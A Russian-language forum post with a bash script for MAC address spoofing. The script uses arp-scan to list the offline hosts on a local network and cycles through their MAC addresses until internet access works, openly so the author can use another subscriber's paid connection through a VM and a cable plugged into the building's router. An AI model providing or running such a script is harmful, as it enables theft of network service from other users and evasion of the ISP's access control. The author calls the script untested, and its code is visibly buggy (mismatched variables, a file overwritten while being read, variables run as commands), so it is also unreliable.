Замена MAC адреса на адрес локальной сети скриптом

[BrunoGray]

Практическая ценность. Заменив MAC на адрес offline компьютера из локальной сети, получаем доступ к интернету от другого пользователя (не всегда, но думаю нет смысла объяснять исключения).

Вариант использования. Ставим на компьютер виртуалку и передаём ей свободную сетевую карту, предварительно подключаем к ней провод (можно купить новый и подключить к маршрутизатору в падъезде). На виртуалке уже используем скрипт и пользуемся чужим интернетом с виртуальной машины. При этом вне виртаулки можем использовать интернет с другого интерфейса. Плюс данного способа в том, что получаем всю скорость локального компьютера сети вместо части трафика при взломе wi-fi.

Создаём пустой документ (замените debian на ваше имя пользователя, что бы узнать $ ls /home)
$touch /home/debian/local.sh

Сразу сделаем его исполнительным
$ chmod +x /home/user/local.sh

Примечание: данный скрипт работает для подключение через interfaces (для подключения через NetworkManager стоит добавить несколько строк с nmcli); скрипт писался на коленке и не был проверен, отпишите в комментариях о работоспособности.

Открываем любым текстовым редактором и вставляем в него следующий текст:

#!/bin/bash
interface="eth0" #"введи название интерфейса (не lo) внутри ковычек" что бы узнать $ ls /sys/class/net
username="debian" #"введи имя пользователя внутри ковычек" что бы узнать $ ls /home

# создаём общий файл имеющихся ip адресов и mac адресов сети
cat /home/"$user"/spoof/localnet | grep '^[0-9]' > /home/"$user"/spoof/localnet

# создаём файл адресов online
sudo arp-scan --interface="$interface" --localnet | grep '^[0-9]' | sed '$d' | sort -t . -k 3,3n -k 4,4n | awk '{print $1,$2}' > /home/"$user"/spoof/online

# добавляем адреса которых нет в localnet из online (новые адреса появятся внизу списка до повторного использования скрипта)
grep -f /home/"$user"/spoof/localnet -v /home/"$user"/online >> /home/"$user"/spoof/localnet

# вычитаем из общего списка адресов, online адреса, получаем offline адреса
grep -f /home/"$user"/spoof/online -v /home/"$user"/spoof/localnet | awk '{print $2}' > /home/"$user"/spoof/offline

c=1
connect=$(ping -I "$interface" -q -c 1 8.8.8.8)
addr=$(sed -n "$c"p /home/"$user"/spoof/offline)

while [[ $connect != "" ]] # до отправки первого пакета (пока ping не перестанет писать 100% пакетов утеряно)
do
	addr=$(sed -n "$c"p /home/"$user"/spoof/offline | awk '{print $2}') # выбераем mac строки соответствующей c (1, 2 и т.д.)
	"$addr"
	sudo ip link set dev "$interface" down # выключаем интерфейс
	sudo ip link set dev "$interface" address "$addr" # заменяем mac на ранее выбранный
	sudo ip link set dev "$interface" up # включаем интерфейс
	connect=$(ping -I "$interface" -q -c 1 8.8.8.8 | grep '100%') # отправляем пакет для проверки
	"$connect"
let "c=c+1"
done

Меняем в 2х первых строчках eth0 на имя устройства и debian на имя пользователя.

Скрипт можно запустить командой:
$ /home/debian/local.sh

Чем больше вы будете запускать скрипт тем большее количество адресов будет доступно для подбора.

 

[BrunoGray]

Кто сумеет дописать скрипт, стучите в жабу (PGP only), буду рад пообщаться.